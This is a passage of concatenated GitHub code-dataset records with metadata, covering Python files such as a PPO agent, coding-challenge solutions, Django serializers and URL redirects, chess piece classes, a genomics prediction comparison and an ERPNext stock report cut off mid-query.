Variable(torch.Tensor(state).unsqueeze(0))\n # input the state into the network...\n action_alpha, action_beta = self.actor_net(state_tensor)\n # build up the beta distribution...\n action = dist.Beta(action_alpha, action_beta).analytic_mean()\n action_real = action.data.cpu().numpy()[0]\n action_real = -1 + 2 * action_real\n # input the action into the 
environment...\n state_, reward, done, _ = self.env.step(action_real)\n # sum the reward...\n reward_sum += reward\n if done:\n break \n state_ = self.normalize_filter(state_, mean, std)\n state = state_\n\n print('the reward sum in this episode is ' + str(reward_sum) + '!')\n\n\n # this is used in the testing...\n def normalize_filter(self, x, mean, std):\n x = (x - mean) / (std + 1e-8)\n x = np.clip(x, -5.0, 5.0)\n\n return x\n\n","repo_name":"TianhongDai/distributed-ppo","sub_path":"dppo_agent.py","file_name":"dppo_agent.py","file_ext":"py","file_size_in_byte":11131,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"20604690481","text":"# Given an array of strings, group anagrams together.\n#\n# Example:\n#\n# Input: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"],\n# Output:\n# [\n# [\"ate\",\"eat\",\"tea\"],\n# [\"nat\",\"tan\"],\n# [\"bat\"]\n# ]\n# Note:\n#\n# All inputs will be in lowercase.\n# The order of your output does not matter.\n\ndef group_anagrams(strs):\n listOfWords = []\n listOfAnagrams = []\n for i in range(len(strs)):\n word = sorted(strs[i])\n word = ''.join(word)\n\n if word in listOfWords:\n indexOfWords = listOfWords.index(word)\n listOfAnagrams[indexOfWords].append(strs[i])\n else:\n listOfWords.append(word)\n listOfAnagrams.append([strs[i]])\n\n return listOfAnagrams\n\nprint(group_anagrams(strs = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]))\n","repo_name":"DarishSakeesing/Coding_Challenges","sub_path":"Group_Anagrams.py","file_name":"Group_Anagrams.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25879651452","text":"while(True):\n try:\n lista = []\n linea = input()\n a, b, c, d = linea.split()\n a, b, c, d = int(a), int(b), int(c), int(d)\n lista.append(a)\n lista.append(b)\n lista.append(c)\n lista.append(d)\n lista.sort()\n if(lista[0]+lista[3] >= lista[1]+lista[2]):\n print((lista[0]+lista[3]) - (lista[1]+lista[2]))\n else:\n print((lista[1]+lista[2]) - (lista[0]+lista[3]))\n except EOFError:\n break\n","repo_name":"roca12/gpccodes","sub_path":"Resueltos/Bryann Valderrama/Python/7886_AssigningTeams.py","file_name":"7886_AssigningTeams.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"74439363922","text":"from rest_framework import serializers\n\nfrom applications.cmdb.models import Relation, CISchema, SchemaThroughRelation\n\n\nclass RelationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Relation\n fields = \"__all__\"\n\n\nclass TopoSchemaSerializer(serializers.ModelSerializer):\n id = serializers.CharField()\n label = serializers.CharField(source=\"alias\")\n text = serializers.SerializerMethodField()\n\n def get_text(self, obj):\n return obj.icon_url.replace(\"cmdb-\", \"\")\n\n class Meta:\n model = CISchema\n fields = (\"id\", \"label\", \"text\")\n\n\nclass TopoRelationSerializer(serializers.ModelSerializer):\n source = serializers.CharField(source=\"parent_id\")\n target = serializers.CharField(source=\"child_id\")\n label = serializers.CharField(source=\"relation.alias\")\n\n class Meta:\n model = SchemaThroughRelation\n fields = (\"source\", \"target\", 
\"label\")\n","repo_name":"xhongc/dj-cmdb","sub_path":"applications/relation/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"7593833076","text":"import numpy as np\r\nfrom numpy.linalg import inv, eig, det\r\nimport math\r\n\r\n#def sin(angle):\r\n# return math.sin(angle)\r\n\t\r\n#def cos(angle):\r\n# return math.cos(angle)\r\n\t\r\n#def tan(angle):\r\n# return math.tan(angle)\r\n\r\ndef AngleCase(i, Angle):\r\n if i == 0:\r\n return Angle\r\n elif i == 1:\r\n return math.pi - Angle\r\n #elif i == 2:\r\n # return Angle\r\n #elif i == 3:\r\n # return Angle - math.pi\r\n\r\ndef AngleCase2(i, Angle):\r\n if i == 0:\r\n return Angle\r\n elif i == 1:\r\n return Angle + math.pi\r\n\r\ndef AngleCorr(Angle):\r\n if Angle > math.pi :\r\n return Angle - 2 * math.pi\r\n elif Angle < -math.pi:\r\n return Angle + 2 * math.pi\r\n else:\r\n return Angle\r\n\r\ndef RotationMatrix(omega, phi, kappa):\r\n MOmega = np.array([[1, 0, 0],[0, math.cos(omega), math.sin(omega)],[0, -math.sin(omega), math.cos(omega)]])\r\n MPhi = np.array([[math.cos(phi), 0, -math.sin(phi)],[0, 1, 0 ],[math.sin(phi), 0, math.cos(phi)]])\r\n MKappa = np.array([[math.cos(kappa), math.sin(kappa), 0],[-math.sin(kappa), math.cos(kappa), 0 ],[0, 0, 1]])\r\n return MKappa.dot(MPhi.dot(MOmega))\r\n\r\nRA = np.array([[-0.068675, -0.0640878, -0.764565],[0.012267, 0.765774, -0.642993],[0.997564, -0.053536, -0.044728]])\r\n\r\nPhi = math.asin(RA[2, 0])\r\nOmega = math.asin(-RA[2, 1] / math.cos(Phi))\r\nKappa = math.asin(-RA[1, 0] / math.cos(Phi))\r\n\r\nKappa2 = math.atan(RA[1, 0] / RA[0, 0])\r\nOmega2 = math.atan(-RA[2, 1] / RA[2, 2])\r\nPhi2 = math.atan(RA[2, 0] * math.cos(Kappa2) / RA[0, 0])\r\n\r\n#Kappa = math.atan(-RA[1,0]/RA[0,0])\r\n#Phi = math.acos(RA[0,0]/math.cos(Kappa))\r\n#Omega = math.acos(RA[2,2]*math.cos(Kappa)/RA[0,0])\r\n\r\nprint(\"Omega = \" + str(Omega*180/math.pi) + \"////\" + \"129.52.40\")\r\nprint(\"Phi = \" + str(Phi*180/math.pi) + \"////\" + \"85.59.59\")\r\nprint(\"Kappa = \" + str(Kappa*180/math.pi) + \"////\" + \"190.07.39\")\r\n\r\nprint(\" \")\r\nprint(\"Omega = \" + str(Omega2*180/math.pi) + \"////\" + \"129.52.40\")\r\nprint(\"Phi = \" + str(Phi2*180/math.pi) + \"////\" + \"85.59.59\")\r\nprint(\"Kappa = \" + str(Kappa2*180/math.pi) + \"////\" + \"190.07.39\")\r\n\r\nAccurateAngle = [0, 0, 0, 0, 0, 0]\r\nAccurateAngle2 = [0, 0, 0, 0, 0, 0]\r\n\r\nmin = 99999999\r\n\r\nfor i in range(2):\r\n om = AngleCase(i, Omega)\r\n for j in range(2):\r\n ph = AngleCase(j, Phi)\r\n for k in range(2):\r\n ka = AngleCase(k, Kappa)\r\n R = RotationMatrix(om, ph, ka)\r\n if abs(det(R.T.dot(RA))) < min:\r\n min = abs(det(R.T.dot(RA)))\r\n AccurateAngle[0] = AngleCorr(om)*180/math.pi\r\n AccurateAngle[1] = AngleCorr(ph)*180/math.pi\r\n AccurateAngle[2] = AngleCorr(ka)*180/math.pi\r\n AccurateAngle[3] = i\r\n AccurateAngle[4] = j\r\n AccurateAngle[5] = k\r\n\r\nfor i in range(2):\r\n om = AngleCase2(i, Omega2)\r\n for j in range(2):\r\n ph = AngleCase2(j, Phi2)\r\n for k in range(2):\r\n ka = AngleCase2(k, Kappa2)\r\n R = RotationMatrix(om, ph, ka)\r\n if abs(det(R.T.dot(RA))) < min:\r\n min = abs(det(R.T.dot(RA)))\r\n AccurateAngle2[0] = AngleCorr(om)*180/math.pi\r\n AccurateAngle2[1] = AngleCorr(ph)*180/math.pi\r\n AccurateAngle2[2] = AngleCorr(ka)*180/math.pi\r\n AccurateAngle2[3] = i\r\n AccurateAngle2[4] = j\r\n AccurateAngle2[5] = k\r\n\t\t\t\t\r\nprint(\" 
\")\r\nprint(AccurateAngle)\r\nprint(AccurateAngle2)\r\nprint(\"[129.52.40 85.59.59 190.07.39]\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\t\t\t\r\n","repo_name":"WeiCheng302/Assignments","sub_path":"Else/angle.py","file_name":"angle.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14478306949","text":"'''\nTitle : Dictionaries and Maps\nSubdomain : 30 Days of Code\nDomain : Python 3\nAuthor : Manuel Zabala\nCreated : 2/19/2019\nProblem : https://www.hackerrank.com/challenges/30-dictionaries-and-maps/problem\n'''\n\n# Number of test cases\ntestnum = int(input())\nphonebook = {}\n\n# iterating to populate dict with given input\nfor _ in range(testnum):\n name, number = input().split()\n phonebook[name] = number\n\nfor _ in range(testnum):\n name = input()\n\n if name in phonebook:\n print('{}={}'.format(name, phonebook[name]))\n else:\n print('Not found')\n","repo_name":"Mzaba014/Hackerrank-Solutions","sub_path":"30 Days of Code/day8_dictionaries_and_maps.py","file_name":"day8_dictionaries_and_maps.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"72311156243","text":"\"\"\"\n\"abacabad\" c\n\"abacabaabacaba\" _\n\"\"\"\ndef first_not_repeating_char(char_secuence):\n\tseen_letters = {}\n\n\tfor i, letter in enumerate(char_secuence):\n\t\tif letter not in seen_letters:\n\t\t\tseen_letters[letter] = (i, 1)\n\t\telse:\n\t\t\tseen_letters[letter] = (seen_letters[letter][0], seen_letters[letter][1] + 1)\n\n\tprint(seen_letters)\n\n\tfinal_letters = []\n\n\tfor key, value in seen_letters.items():\n\t\tif value[1] == 1:\n\t\t\tfinal_letters.append( (key, value[0]) )\n\n\t\t\t#La función lambda hace lo mismo que sort_order()\n\t\t\t# def sort_order(value):\n\t\t\t# \treturn value[1]\n\n\tnot_repeated_letters = sorted(final_letters, key=lambda value: value[1])\n\n\tif not_repeated_letters:\n\t\treturn not_repeated_letters[0][0]\n\telse:\n\t\treturn '_'\n\n\nif __name__ == '__main__':\n\tchar_secuence = str(input('Escribe una secuencia de caracteres: '))\n\n\tresult = first_not_repeating_char(char_secuence)\n\n\tif result == '_':\n\t\tprint('Todos los caracteres se repiten')\n\telse:\n\t\tprint('El primer caracater que no se repite es: {}'.format(result))","repo_name":"jbeltranleon/python-basics","sub_path":"first_not_repeating_char.py","file_name":"first_not_repeating_char.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"38301909968","text":"import numpy as np\nimport pandas as pd\nfrom typing import Literal\nfrom pprint import pformat\nfrom functools import cached_property\nfrom cuppa.classifier.cuppa_prediction import CuppaPredSummary\nfrom cuppa.logger import LoggerMixin\nfrom cuppa.misc.utils import as_categorical\n\n\nclass CuppaCompare(LoggerMixin):\n\n \"\"\"\n Compares two CuppaPredSummary objects\n\n This class can be instantiated directly given two CuppaPredSummary objects. One is referred to as 'old' and the\n other as 'new'. 
Alternatively, prediction summaries stored as tsv files can also be loaded using the\n from_pred_summ_files() method.\n\n The following properties contain the comparison stats:\n\n prediction_comparison: Comparison of the top-1 prediction probabilities and classes for each sample.\n The 'correct_type' column shows whether the prediction in old only, new only, both or neither.\n\n correct_type_stats: Counts of each 'correct_type' per classifier\n\n performance_comparison: Comparison of recall and precision per class. This table also shows a comparison per\n class of the number of samples in total, predicted as that class, and correctly predicted.\n \"\"\"\n\n def __init__(\n self,\n pred_summ_old: CuppaPredSummary,\n pred_summ_new: CuppaPredSummary,\n ):\n self.pred_summ_old = pred_summ_old\n self.pred_summ_new = pred_summ_new\n\n self._check_actual_class_column_exists()\n\n\n def __repr__(self) -> str:\n return pformat(vars(self))\n\n def _check_actual_class_column_exists(self):\n error_msg = \"`actual_class` column is required but absent from `%s`\"\n\n if not self.pred_summ_old._has_actual_class_column:\n self.logger.error(error_msg % \"pred_summ_old\")\n raise KeyError\n\n if not self.pred_summ_new._has_actual_class_column:\n self.logger.error(error_msg % \"pred_summ_new\")\n raise KeyError\n\n @staticmethod\n def from_pred_summ_files(path_old: str, path_new: str):\n return CuppaCompare(\n pred_summ_old = CuppaPredSummary.from_tsv(path_old),\n pred_summ_new = CuppaPredSummary.from_tsv(path_new)\n )\n\n @staticmethod\n def _align_rows(\n df1: pd.DataFrame,\n df2: pd.DataFrame,\n index_columns: str | list[str] | pd.Series,\n index_location: Literal[\"both\", \"columns\", \"index\"] = \"both\",\n copy: bool = True\n ) -> tuple[pd.DataFrame, pd.DataFrame]:\n\n if copy:\n df1 = df1.copy()\n df2 = df2.copy()\n\n ## Get all rows, given `index_columns`\n index_union = pd.concat([\n df1[index_columns],\n df2[index_columns],\n ])\n\n ## Make indexes\n if len(pd.Series(index_columns))==1:\n index_union = index_union.unique()\n\n df1.index = df1[index_columns]\n df2.index = df2[index_columns]\n else:\n index_union = index_union.drop_duplicates()\n index_union = pd.MultiIndex.from_frame(index_union)\n\n df1.index = pd.MultiIndex.from_frame(df1[index_columns])\n df2.index = pd.MultiIndex.from_frame(df2[index_columns])\n\n ## Align indexes\n df1 = df1.reindex(index_union)\n df2 = df2.reindex(index_union)\n\n if index_location == \"columns\":\n df1.reset_index(inplace=True, drop=True)\n df2.reset_index(inplace=True, drop=True)\n\n if index_location == \"index\":\n df1.drop(index_columns, inplace=True, axis=1)\n df2.drop(index_columns, inplace=True, axis=1)\n\n return df1, df2\n\n @staticmethod\n def _move_index_to_columns(df: pd.DataFrame):\n df.index.names = pd.MultiIndex.from_arrays([\n [\"info\"] * len(df.index.names),\n df.index.names\n ])\n df = df.reset_index()\n return df\n\n @cached_property\n def prediction_comparison(self) -> pd.DataFrame:\n\n new = self.pred_summ_new.copy()\n old = self.pred_summ_old.copy()\n\n required_columns = [\"sample_id\", \"clf_name\", \"actual_class\", \"pred_class_1\", \"pred_prob_1\", \"is_correct_pred\"]\n new = new[required_columns]\n old = old[required_columns]\n\n new, old = self._align_rows(\n df1 = new,\n df2 = old,\n index_columns = [\"sample_id\", \"clf_name\"],\n index_location = \"index\",\n copy = False\n )\n\n def get_correct_type():\n _new = new[\"is_correct_pred\"]\n _old = old[\"is_correct_pred\"]\n\n correct_type = np.full(len(new), np.nan, 
dtype=object)\n\n correct_type[(_new == True) & (_old == True) ] = \"both\"\n correct_type[(_new == True) & (_old == False)] = \"new_only\"\n correct_type[(_new == False) & (_old == True) ] = \"old_only\"\n correct_type[(_new == False) & (_old == False)] = \"neither\"\n\n return pd.Series(correct_type, index=new.index)\n\n def column_equal(column: str) -> pd.Series:\n output = new[column] == old[column]\n output[new[column].isna() | old[column].isna()] = np.nan\n return output\n\n info = pd.DataFrame(dict(\n correct_type=get_correct_type()\n ))\n\n is_equal = pd.DataFrame(dict(\n actual_class = column_equal(\"actual_class\"),\n pred_class_1 = column_equal(\"pred_class_1\"),\n pred_prob_1 = column_equal(\"pred_prob_1\"),\n ))\n\n comparison = pd.concat(\n dict(info=info, is_equal=is_equal, new=new, old=old),\n axis=1\n )\n\n comparison = self._move_index_to_columns(comparison)\n\n ## Force classifier order\n clf_names = comparison[(\"info\",\"clf_name\")]\n clf_names = as_categorical(clf_names)\n comparison[(\"info\", \"clf_name\")] = clf_names\n\n return comparison\n\n @cached_property\n def correct_type_stats(self) -> pd.DataFrame:\n comparison = self.prediction_comparison\n\n stats = comparison[\"info\"]\\\n .groupby(\"clf_name\")\\\n [\"correct_type\"]\\\n .value_counts(dropna=False)\\\n .reset_index()\n\n return stats\n\n @cached_property\n def performance_comparison(self) -> pd.DataFrame:\n new = self.pred_summ_new.performance()\n old = self.pred_summ_old.performance()\n\n new, old = self._align_rows(\n df1=new,\n df2=old,\n index_columns=[\"class\", \"clf_name\"],\n index_location=\"index\",\n copy=False\n )\n\n diff = new - old\n\n comparison = pd.concat(\n dict(diff=diff, new=new, old=old),\n axis=1\n )\n\n comparison = self._move_index_to_columns(comparison)\n\n return comparison\n\n\n\n","repo_name":"hartwigmedical/hmftools","sub_path":"cuppa/src/main/python/pycuppa/cuppa/classifier/cuppa_compare.py","file_name":"cuppa_compare.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"3"} +{"seq_id":"17481248095","text":"from django.conf.urls import patterns, url\nfrom django.views.generic import RedirectView\n\nfrom . 
import views\n\n\nAPP_SLUGS = {\n 'chrono': 'Chrono',\n 'face_value': 'Face_Value',\n 'podcasts': 'Podcasts',\n 'roller': 'Roller',\n 'webfighter': 'Webfighter',\n 'generalnotes': 'General_Notes',\n 'rtcamera': 'rtcamera'\n}\n\n\ndef redirect_doc(uri, request=None):\n view = RedirectView.as_view(\n url='https://developer.mozilla.org/docs%s' % uri)\n return view(request) if request else view\n\n\nredirect_patterns = patterns(\n '',\n url('^docs/firefox_os_guideline$',\n redirect_doc('/Web/Apps/Design'),\n name='ecosystem.ffos_guideline'),\n url('^docs/responsive_design$',\n redirect_doc('/Web_Development/Mobile/Responsive_design'),\n name='ecosystem.responsive_design'),\n url('^docs/patterns$',\n redirect_doc('/Web/Apps/Design/Responsive_Navigation_Patterns'),\n name='ecosystem.design_patterns'),\n url('^docs/review$',\n redirect_doc('/Web/Apps/Publishing/Marketplace_review_criteria'),\n name='ecosystem.publish_review'),\n url('^docs/deploy$',\n redirect_doc('/Mozilla/Marketplace/Options/Introduction'),\n name='ecosystem.publish_deploy'),\n url('^docs/hosted$',\n redirect_doc('/Mozilla/Marketplace/Options/Self_publishing'\n '#Self-publishing_Hosted_Apps'),\n name='ecosystem.publish_hosted'),\n url('^docs/submission$',\n redirect_doc('/Mozilla/Marketplace/Publishing/Submit/Overview'),\n name='ecosystem.publish_submit'),\n url('^docs/packaged$',\n redirect_doc('/Mozilla/Marketplace/Options/Packaged_apps'),\n name='ecosystem.publish_packaged'),\n url('^docs/intro_apps$',\n redirect_doc('/Web/Apps/Quickstart/Build/Intro_to_open_web_apps'),\n name='ecosystem.build_intro'),\n url('^docs/firefox_os$',\n redirect_doc('/Mozilla/Firefox_OS'),\n name='ecosystem.build_ffos'),\n url('^docs/manifests$',\n redirect_doc('/Web/Apps/FAQs/About_app_manifests'),\n name='ecosystem.build_manifests'),\n url('^docs/apps_offline$',\n redirect_doc('/Web/Apps/Offline_apps'),\n name='ecosystem.build_apps_offline'),\n url('^docs/game_apps$',\n redirect_doc('/Web/Apps/Developing/Games'),\n name='ecosystem.build_game_apps'),\n url('^docs/mobile_developers$',\n redirect_doc('/Web/Apps/Quickstart/Build/For_mobile_developers'),\n name='ecosystem.build_mobile_developers'),\n url('^docs/web_developers$',\n redirect_doc('/Web/Apps/Quickstart/Build/For_Web_developers'),\n name='ecosystem.build_web_developers'),\n url('^docs/firefox_os_simulator$',\n redirect_doc('/Tools/Firefox_OS_Simulator'),\n name='ecosystem.firefox_os_simulator'),\n url('^docs/payments$',\n redirect_doc('/Mozilla/Marketplace/Monetization'\n '/Introduction_Monetization'),\n name='ecosystem.build_payments'),\n url('^docs/concept$',\n redirect_doc('/Web/Apps/Quickstart/Design/Concept_A_great_app'),\n name='ecosystem.design_concept'),\n url('^docs/fundamentals$',\n redirect_doc('/Web/Apps/Design/Design_Principles'),\n name='ecosystem.design_fundamentals'),\n url('^docs/ui_guidelines$',\n redirect_doc('/Web/Apps/Design'),\n name='ecosystem.design_ui'),\n url('^docs/quick_start$',\n redirect_doc('/Web/Apps/Quickstart'),\n name='ecosystem.build_quick'),\n url('^docs/reference_apps$',\n redirect_doc('/Web/Apps/Reference_apps'),\n name='ecosystem.build_reference'),\n url('^docs/apps/(?P\\w+)?$',\n lambda req, page:\n redirect_doc('/Web/Apps/Reference_apps/' + APP_SLUGS.get(page, ''),\n req),\n name='ecosystem.apps_documentation'),\n url('^docs/payments/status$',\n redirect_doc('/Mozilla/Marketplace/Payments_Status'),\n name='ecosystem.publish_payments'),\n url('^docs/tools$',\n redirect_doc('/Web/Apps/Quickstart/Build/App_tools'),\n name='ecosystem.build_tools'),\n 
url('^docs/app_generator$',\n redirect_doc('/Web/Apps/Developing/App_templates'),\n name='ecosystem.build_app_generator'),\n url('^docs/app_manager$',\n redirect_doc('/Mozilla/Firefox_OS/Using_the_App_Manager'),\n name='ecosystem.app_manager'),\n url('^docs/dev_tools$',\n redirect_doc('/Tools'),\n name='ecosystem.build_dev_tools'),\n\n # Doesn't start with docs/, but still redirects to MDN.\n url('^dev_phone$',\n redirect_doc('/Mozilla/Firefox_OS/Developer_phone_guide/Flame'),\n name='ecosystem.dev_phone'),\n)\n\n\nurlpatterns = redirect_patterns + patterns(\n '',\n url('^$', views.landing, name='ecosystem.landing'),\n url('^partners$', views.partners, name='ecosystem.partners'),\n url('^support$', views.support, name='ecosystem.support'),\n url('^docs/badges$', views.publish_badges, name='ecosystem.publish_badges')\n)\n","repo_name":"mozilla/zamboni","sub_path":"mkt/ecosystem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4986,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"3"} +{"seq_id":"3541711220","text":"# Import the pyparsing package for removing comments\nimport tokenize, io, re\n\n# Function to collect data from a given file\ndef dataFromFile(fileName) :\n\tf = open(fileName, 'r')\n\tdata = f.read()\n\tf.close()\n\treturn data\n\n# Function to remove comments from given source code\ndef rmComments(code) :\n\t# List to store uncommented part of code\n\tresult = []\n\t# Process each line for tokenizing it\n\tg = tokenize.generate_tokens(io.BytesIO(bytes(code)).readline)\n\tfor toknum, tokval, _, _, _ in g:\n\t\t# Remove corresponding token if it is a # comment\n\t\tif toknum != tokenize.COMMENT :\n\t\t\tresult.append((toknum, tokval))\n\t\n\t# Return the untokenized form of the so opbtained code\n\treturn tokenize.untokenize(result)\n\n# Function to remove empty lines from the code\ndef pruneCode(code) :\n\tcode = filter(lambda line: re.search(\"\\S\", line), code.split(\"\\n\"))\n\treturn \"\\n\".join(code)\n\n# Function to compline all necessary preprocessors together\ndef preprocess(code) :\n\tcode = rmComments(code)\n\tcode = pruneCode(code)\n\treturn code\n","repo_name":"rohit04saluja/micro-codes","sub_path":"python/SVV/Python/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41360730405","text":"class Solution:\n def characterReplacement(self, s: str, k: int) -> int:\n map = {}\n res = 0\n i = 0\n for j in range(len(s)):\n map[s[j]] = map.get(s[j], 0) + 1\n\n if (j - i + 1) - max(map.values()) > k:\n map[s[i]] = map[s[i]] - 1\n i += 1\n\n res = max(res, j - i + 1)\n\n return res\n\n\n\n\n","repo_name":"msraychiu/MyPythonNeetcodeLearning","sub_path":"sliding_window/longest_repeating_character_replacement.py","file_name":"longest_repeating_character_replacement.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74995057681","text":"from abc import ABC, abstractmethod\nfrom typing import NamedTuple, List\nfrom models.square import Square\n\n\nclass DirectionVec(NamedTuple):\n file: int\n rank: int\n\n\nclass Directions:\n ORTHOGONAL = {\n 'North': DirectionVec(0,-1),\n 'South': DirectionVec(0,1),\n 'West': DirectionVec(-1,0),\n 'East': DirectionVec(1,0),\n }\n \n DIAGONAL = {\n 'Topleft': DirectionVec(-1,-1),\n 'Topright': DirectionVec(-1,1),\n 'Bottomleft': 
DirectionVec(1,-1),\n 'Bottomright': DirectionVec(1,1),\n }\n \n COMBINED = {**ORTHOGONAL, **DIAGONAL}\n \n KNIGHT = {\n 'TL': DirectionVec(-1,-2),\n 'TL2': DirectionVec(-2,-1),\n 'BL': DirectionVec(-2,1),\n 'BL2': DirectionVec(-1,2),\n 'TR': DirectionVec(1,-2),\n 'TR2': DirectionVec(2,-1),\n 'BR': DirectionVec(2,1),\n 'BR2': DirectionVec(1,2),\n }\n \n\nPIECE_ABBREVIATIONS = list(iter(\"BRQKN\"))\n\n\nclass Piece(ABC):\n directions = None\n abbreviation = None\n\n def __init__(self, square: Square, board):\n self.square = square\n self.board = board # reference to board object\n\n @abstractmethod\n def get_moves(self) -> List[Square]:\n pass\n\n\nclass SlidingPiece(Piece):\n def get_moves(self) -> List[Square]:\n moves = []\n\n for direction in self.directions.values():\n new_square = self.square # start from current square\n\n while True:\n new_file = new_square.file + direction.file\n new_rank = new_square.rank + direction.rank\n\n try:\n new_square = Square(new_file, new_rank)\n except ValueError:\n # we are out of bounds -> this square doesn't exist\n # move to next direction\n break\n\n # if square exists but its occupied -> move to next direction\n if new_square in self.board.occupied:\n break\n\n moves.append(new_square)\n\n return moves\n\n\nclass NonSlidingPiece(Piece):\n def get_moves(self) -> List[Square]:\n moves = []\n\n for direction in self.directions.values():\n new_file = self.square.file + direction.file\n new_rank = self.square.rank + direction.rank\n\n try:\n new_square = Square(new_file, new_rank)\n except ValueError:\n # we are out of bounds -> this square doesn't exist\n # move to next direction\n continue\n\n # if square exists but its occupied -> move to next direction\n if new_square in self.board.occupied:\n continue\n\n moves.append(new_square)\n\n return moves\n\n\nclass Bishop(SlidingPiece):\n directions = Directions.DIAGONAL\n abbreviation = \"B\"\n\n\nclass Rook(SlidingPiece):\n directions = Directions.ORTHOGONAL\n abbreviation = \"R\"\n \n\nclass Queen(SlidingPiece):\n directions = Directions.COMBINED\n abbreviation = \"Q\"\n\n\nclass King(NonSlidingPiece):\n directions = Directions.COMBINED\n abbreviation = \"K\"\n\n\nclass Knight(NonSlidingPiece):\n directions = Directions.KNIGHT\n abbreviation = \"N\"\n","repo_name":"AngelVI13/visu","sub_path":"src/models/pieces.py","file_name":"pieces.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72067585362","text":"from __future__ import unicode_literals\nimport frappe, erpnext\nfrom frappe import _\nfrom frappe.utils import has_common\nimport json\nfrom six import StringIO, string_types\nfrom datetime import date\nfrom frappe.utils import cstr, getdate, split_emails, add_days, today, get_last_day, get_first_day, month_diff, nowdate, cint, flt, date_diff\nfrom six import iteritems\nimport datetime\nfrom datetime import date\nfrom dateutil.relativedelta import relativedelta\nimport copy\n\ndef execute(filters=None):\n\tcolumns, data = get_columns(), get_data(filters)\n\treturn columns, data\n\t\ndef get_data(filters):\n\n\tif filters.get(\"company\"):\n\t\tcompany_currency = erpnext.get_company_currency(filters.get(\"company\"))\n\telse:\n\t\tcompany_currency = frappe.db.get_single_value(\"Global Defaults\", \"default_currency\")\n\n\titems = get_items(filters)\n\tsle = get_stock_ledger_entries(filters, items)\n\tiwb_map = get_item_warehouse_map(filters, sle)\n\n\titem_map = get_item_details(items, sle, 
filters)\n\titem_reorder_detail_map = get_item_reorder_details(item_map.keys())\n\tstock_qty=stock_qty_before_some_month(filters)\n\tdata = []\n\tconversion_factors = {}\n\n\t_func = lambda x: x[1]\n\n\tfor (company, item, warehouse) in sorted(iwb_map):\n\t\tif item_map.get(item):\n\t\t\tqty_dict = iwb_map[(company, item, warehouse)]\n\t\t\titem_reorder_level = 0\n\t\t\titem_reorder_qty = 0\n\t\t\tif item + warehouse in item_reorder_detail_map:\n\t\t\t\titem_reorder_level = item_reorder_detail_map[item + warehouse][\"warehouse_reorder_level\"]\n\t\t\t\titem_reorder_qty = item_reorder_detail_map[item + warehouse][\"warehouse_reorder_qty\"]\n\t\t\t\n\t\t\tlast_stock_updated_date=frappe.db.sql(\"\"\"SELECT item_code, posting_date from `tabStock Ledger Entry` where item_code='{0}' and company='{1}' and warehouse='{2}' ORDER BY posting_date DESC \"\"\".format(item, company, warehouse), as_dict=1)\n\n\t\t\tif item in stock_qty and stock_qty.get(item).get(\"warehouse\")==warehouse:\n\t\t\t\treport_data = {\n\t\t\t\t\t'currency': company_currency,\n\t\t\t\t\t'item_code': item,\n\t\t\t\t\t'warehouse': warehouse,\n\t\t\t\t\t'company': company,\n\t\t\t\t\t'reorder_level': item_reorder_level,\n\t\t\t\t\t'reorder_qty': item_reorder_qty,\n\t\t\t\t\t'last_stock_updated_date':last_stock_updated_date[0].get(\"posting_date\") if last_stock_updated_date[0] else \"\",\n\t\t\t\t\t'days_60':stock_qty.get(item).get(2, 0),\n\t\t\t\t\t'days_90':stock_qty.get(item).get(3, 0),\n\t\t\t\t\t'days_180':stock_qty.get(item).get(6, 0),\n\t\t\t\t\t'year_1':stock_qty.get(item).get(12, 0),\n\t\t\t\t\t'year_2':stock_qty.get(item).get(24, 0)\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\treport_data = {\n\t\t\t\t\t'currency': company_currency,\n\t\t\t\t\t'item_code': item,\n\t\t\t\t\t'warehouse': warehouse,\n\t\t\t\t\t'company': company,\n\t\t\t\t\t'reorder_level': item_reorder_level,\n\t\t\t\t\t'reorder_qty': item_reorder_qty,\n\t\t\t\t\t'last_stock_updated_date':last_stock_updated_date[0].get(\"posting_date\") if last_stock_updated_date[0] else \"\"\n\t\t\t\t}\n\n\n\t\t\treport_data.update(item_map[item])\n\t\t\treport_data.update(qty_dict)\n\t\t\tdata.append(report_data)\n\n\n\treturn data\n\n\ndef get_stock_ledger_entries(filters, items):\n\titem_conditions_sql = ''\n\tif items:\n\t\titem_conditions_sql = ' and sle.item_code in ({})'\\\n\t\t\t.format(', '.join([frappe.db.escape(i, percent=False) for i in items]))\n\n\tconditions = get_conditions(filters)\n\n\treturn frappe.db.sql(\"\"\"\n\t\tselect\n\t\t\tsle.item_code, warehouse, sle.posting_date, sle.actual_qty, 